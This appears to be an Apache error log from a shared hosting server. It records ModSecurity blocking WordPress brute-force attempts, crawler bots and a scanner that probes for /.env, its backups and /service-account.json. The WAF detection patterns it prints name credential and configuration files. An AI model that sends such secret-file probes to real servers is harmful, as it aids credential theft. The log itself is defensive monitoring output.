[Tue May 26 18:40:14.076237 2026] [core:error] [pid 1015481:tid 1015663] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.076251 2026] [core:error] [pid 1015481:tid 1015663] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.177387 2026] [core:error] [pid 1015481:tid 1015681] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.177414 2026] [core:error] [pid 1015481:tid 1015681] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.314859 2026] [security2:error] [pid 1015481:tid 1015671] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbtbQIKfWDMlp2INdUdQAAAUY"]
[Tue May 26 18:40:14.332306 2026] [core:error] [pid 1015481:tid 1015627] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.332335 2026] [core:error] [pid 1015481:tid 1015627] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.337539 2026] [core:error] [pid 1015481:tid 1015696] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.337569 2026] [core:error] [pid 1015481:tid 1015696] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.383472 2026] [security2:error] [pid 1015481:tid 1015504] [remote 119.18.52.246:55852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbtrQIKfWDMlp2INdUlQABIxY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:40:15.300972 2026] [security2:error] [pid 1015481:tid 1015494] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbt7QIKfWDMlp2INdUqgABagw"]
[Tue May 26 18:40:15.301123 2026] [security2:error] [pid 1015481:tid 1015707] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbt7QIKfWDMlp2INdUqgABagw"]
[Tue May 26 18:40:16.966148 2026] [security2:error] [pid 1015481:tid 1015687] [client 52.167.144.149:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWbuLQIKfWDMlp2INdUwgAAAVY"]
[Tue May 26 18:40:17.268469 2026] [security2:error] [pid 1015481:tid 1015712] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbuLQIKfWDMlp2INdUyAAAAW8"]
[Tue May 26 18:40:17.620765 2026] [security2:error] [pid 1015481:tid 1015689] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWbubQIKfWDMlp2INdU1wAAAVg"]
[Tue May 26 18:40:18.037231 2026] [security2:error] [pid 1015481:tid 1015612] [client 176.31.139.9:17864] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "dassmerchandise.com"] [uri "/robots.txt"] [unique_id "ahWburQIKfWDMlp2INdU2wAAAQs"]
[Tue May 26 18:40:18.037351 2026] [security2:error] [pid 1015481:tid 1015612] [client 176.31.139.9:17864] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dassmerchandise.com"] [uri "/robots.txt"] [unique_id "ahWburQIKfWDMlp2INdU2wAAAQs"]
[Tue May 26 18:40:19.393312 2026] [security2:error] [pid 1015481:tid 1015708] [client 54.39.136.152:19744] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "dassmerchandise.com"] [uri "/"] [unique_id "ahWbu7QIKfWDMlp2INdU7AAAAWs"]
[Tue May 26 18:40:19.393442 2026] [security2:error] [pid 1015481:tid 1015708] [client 54.39.136.152:19744] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dassmerchandise.com"] [uri "/"] [unique_id "ahWbu7QIKfWDMlp2INdU7AAAAWs"]
[Tue May 26 18:40:20.014801 2026] [security2:error] [pid 1015481:tid 1015713] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbu7QIKfWDMlp2INdU9QAAAXA"]
[Tue May 26 18:40:20.618076 2026] [security2:error] [pid 1015481:tid 1015622] [client 45.45.237.225:48254] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "gciamd.org.in"] [uri "/.env"] [unique_id "ahWbvLQIKfWDMlp2INdVAgAAARU"]
[Tue May 26 18:40:20.770231 2026] [security2:error] [pid 1015481:tid 1015674] [client 45.45.237.225:48254] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "gciamd.org.in"] [uri "/.env.bak"] [unique_id "ahWbvLQIKfWDMlp2INdVBgAAAUk"]
[Tue May 26 18:40:20.770390 2026] [security2:error] [pid 1015481:tid 1015674] [client 45.45.237.225:48254] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "gciamd.org.in"] [uri "/.env.bak"] [unique_id "ahWbvLQIKfWDMlp2INdVBgAAAUk"]
[Tue May 26 18:40:20.794358 2026] [security2:error] [pid 1015481:tid 1015666] [client 45.45.237.225:48246] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "gciamd.org.in"] [uri "/.env.backup"] [unique_id "ahWbvLQIKfWDMlp2INdVBwAAAUE"]
[Tue May 26 18:40:20.835317 2026] [security2:error] [pid 1015481:tid 1015631] [client 45.45.237.225:48344] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "gciamd.org.in"] [uri "/service-account.json"] [unique_id "ahWbvLQIKfWDMlp2INdVFAAAAR4"]
[Tue May 26 18:40:20.835470 2026] [security2:error] [pid 1015481:tid 1015631] [client 45.45.237.225:48344] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "gciamd.org.in"] [uri "/service-account.json"] [unique_id "ahWbvLQIKfWDMlp2INdVFAAAAR4"]
[Tue May 26 18:40:21.523027 2026] [security2:error] [pid 1015481:tid 1015617] [client 45.45.237.225:48504] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "gcirsm.org.in"] [uri "/.env"] [unique_id "ahWbvbQIKfWDMlp2INdVLgAAARA"]
[Tue May 26 18:40:21.856331 2026] [security2:error] [pid 1015481:tid 1015646] [client 45.45.237.225:48510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "gcirsm.org.in"] [uri "/.env.backup"] [unique_id "ahWbvbQIKfWDMlp2INdVQgAAAS0"]
[Tue May 26 18:40:21.858812 2026] [security2:error] [pid 1015481:tid 1015737] [client 45.45.237.225:48498] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "gcirsm.org.in"] [uri "/.env.bak"] [unique_id "ahWbvbQIKfWDMlp2INdVQQAAAYg"]
[Tue May 26 18:40:22.802765 2026] [security2:error] [pid 1015481:tid 1015711] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbvrQIKfWDMlp2INdVYgAAAW4"]
[Tue May 26 18:40:23.251102 2026] [security2:error] [pid 1015481:tid 1015625] [client 124.43.5.103:63955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbv7QIKfWDMlp2INdVdgAAARg"]
[Tue May 26 18:40:23.251265 2026] [security2:error] [pid 1015481:tid 1015625] [client 124.43.5.103:63955] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbv7QIKfWDMlp2INdVdgAAARg"]
[Tue May 26 18:40:23.649300 2026] [security2:error] [pid 1015481:tid 1015651] [client 31.57.184.107:54300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "operadoraquimicamedica.com.mx.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWbv7QIKfWDMlp2INdVdwAAATI"]
[Tue May 26 18:40:23.730760 2026] [security2:error] [pid 1015481:tid 1015521] [remote 161.97.109.81:58460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.109.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWbv7QIKfWDMlp2INdVeAABaic"]
[Tue May 26 18:40:23.852783 2026] [security2:error] [pid 1015481:tid 1015737] [client 45.45.237.225:48706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/index.php"] [unique_id "ahWbv7QIKfWDMlp2INdVfAAAAYg"]
[Tue May 26 18:40:23.885023 2026] [security2:error] [pid 1015481:tid 1015702] [client 45.45.237.225:48716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-downloads-constitution.php"] [unique_id "ahWbv7QIKfWDMlp2INdVfwAAAWU"]
[Tue May 26 18:40:23.885054 2026] [security2:error] [pid 1015481:tid 1015656] [client 45.45.237.225:48682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-grandofficers.php"] [unique_id "ahWbv7QIKfWDMlp2INdVfgAAATc"]
[Tue May 26 18:40:23.885137 2026] [security2:error] [pid 1015481:tid 1015727] [client 45.45.237.225:48726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-councilmeetingdays.php"] [unique_id "ahWbv7QIKfWDMlp2INdVgAAAAX4"]
[Tue May 26 18:40:23.885160 2026] [security2:error] [pid 1015481:tid 1015665] [client 45.45.237.225:48592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-downloads-forms.php"] [unique_id "ahWbv7QIKfWDMlp2INdVhAAAAUA"]
[Tue May 26 18:40:23.885251 2026] [security2:error] [pid 1015481:tid 1015714] [client 45.45.237.225:48604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-downloads-circulars.php"] [unique_id "ahWbv7QIKfWDMlp2INdVggAAAXE"]
[Tue May 26 18:40:23.885286 2026] [security2:error] [pid 1015481:tid 1015660] [client 45.45.237.225:48672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-districtsandcouncils.php"] [unique_id "ahWbv7QIKfWDMlp2INdVgQAAATs"]
[Tue May 26 18:40:23.885332 2026] [security2:error] [pid 1015481:tid 1015621] [client 45.45.237.225:48638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-about-history.php"] [unique_id "ahWbv7QIKfWDMlp2INdVgwAAARQ"]
[Tue May 26 18:40:23.885375 2026] [security2:error] [pid 1015481:tid 1015645] [client 45.45.237.225:48708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-about-overview.php"] [unique_id "ahWbv7QIKfWDMlp2INdVfQAAASw"]
[Tue May 26 18:40:23.885867 2026] [security2:error] [pid 1015481:tid 1015691] [client 45.45.237.225:48622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-about-india.php"] [unique_id "ahWbv7QIKfWDMlp2INdVhQAAAVo"]
[Tue May 26 18:40:23.921873 2026] [security2:error] [pid 1015481:tid 1015659] [client 45.45.237.225:48402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/index.php"] [unique_id "ahWbv7QIKfWDMlp2INdVhgAAATo"]
[Tue May 26 18:40:23.936598 2026] [security2:error] [pid 1015481:tid 1015720] [client 45.45.237.225:48418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-downloads-constitution.php"] [unique_id "ahWbv7QIKfWDMlp2INdVhwAAAXc"]
[Tue May 26 18:40:23.936653 2026] [security2:error] [pid 1015481:tid 1015616] [client 45.45.237.225:48374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-downloads-circulars.php"] [unique_id "ahWbv7QIKfWDMlp2INdViAAAAQ8"]
[Tue May 26 18:40:23.936736 2026] [security2:error] [pid 1015481:tid 1015618] [client 45.45.237.225:48326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-grandofficers.php"] [unique_id "ahWbv7QIKfWDMlp2INdVigAAARE"]
[Tue May 26 18:40:23.936886 2026] [security2:error] [pid 1015481:tid 1015704] [client 45.45.237.225:48452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-councilmeetingdays.php"] [unique_id "ahWbv7QIKfWDMlp2INdVjAAAAWc"]
[Tue May 26 18:40:23.937007 2026] [security2:error] [pid 1015481:tid 1015624] [client 45.45.237.225:48276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-about-overview.php"] [unique_id "ahWbv7QIKfWDMlp2INdViQAAARc"]
[Tue May 26 18:40:23.937070 2026] [security2:error] [pid 1015481:tid 1015623] [client 45.45.237.225:48390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-downloads-forms.php"] [unique_id "ahWbv7QIKfWDMlp2INdViwAAARY"]
[Tue May 26 18:40:23.937269 2026] [security2:error] [pid 1015481:tid 1015720] [client 45.45.237.225:48290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-districtsandcouncils.php"] [unique_id "ahWbv7QIKfWDMlp2INdVjQAAAXc"]
[Tue May 26 18:40:23.937462 2026] [security2:error] [pid 1015481:tid 1015620] [client 45.45.237.225:48474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-about-india.php"] [unique_id "ahWbv7QIKfWDMlp2INdVjgAAARM"]
[Tue May 26 18:40:23.937736 2026] [security2:error] [pid 1015481:tid 1015738] [client 45.45.237.225:48490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-about-history.php"] [unique_id "ahWbv7QIKfWDMlp2INdVjwAAAYk"]
[Tue May 26 18:40:24.005906 2026] [security2:error] [pid 1015481:tid 1015664] [client 45.45.237.225:48692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-downloads-annualreports.php"] [unique_id "ahWbwLQIKfWDMlp2INdVkAAAAT8"]
[Tue May 26 18:40:24.039681 2026] [security2:error] [pid 1015481:tid 1015736] [client 45.45.237.225:48632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-regalia.php"] [unique_id "ahWbwLQIKfWDMlp2INdVkQAAAYc"]
[Tue May 26 18:40:24.049491 2026] [security2:error] [pid 1015481:tid 1015678] [client 45.45.237.225:48712] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "gcirsm.org.in"] [uri "/rsm-website-disclaimer.php"] [unique_id "ahWbwLQIKfWDMlp2INdVlQAAAU0"]
[Tue May 26 18:40:24.049834 2026] [security2:error] [pid 1015481:tid 1015712] [client 45.45.237.225:48658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-faq.php"] [unique_id "ahWbwLQIKfWDMlp2INdVkwAAAW8"]
[Tue May 26 18:40:24.049848 2026] [security2:error] [pid 1015481:tid 1015689] [client 45.45.237.225:48586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-website-terms.php"] [unique_id "ahWbwLQIKfWDMlp2INdVlgAAAVg"]
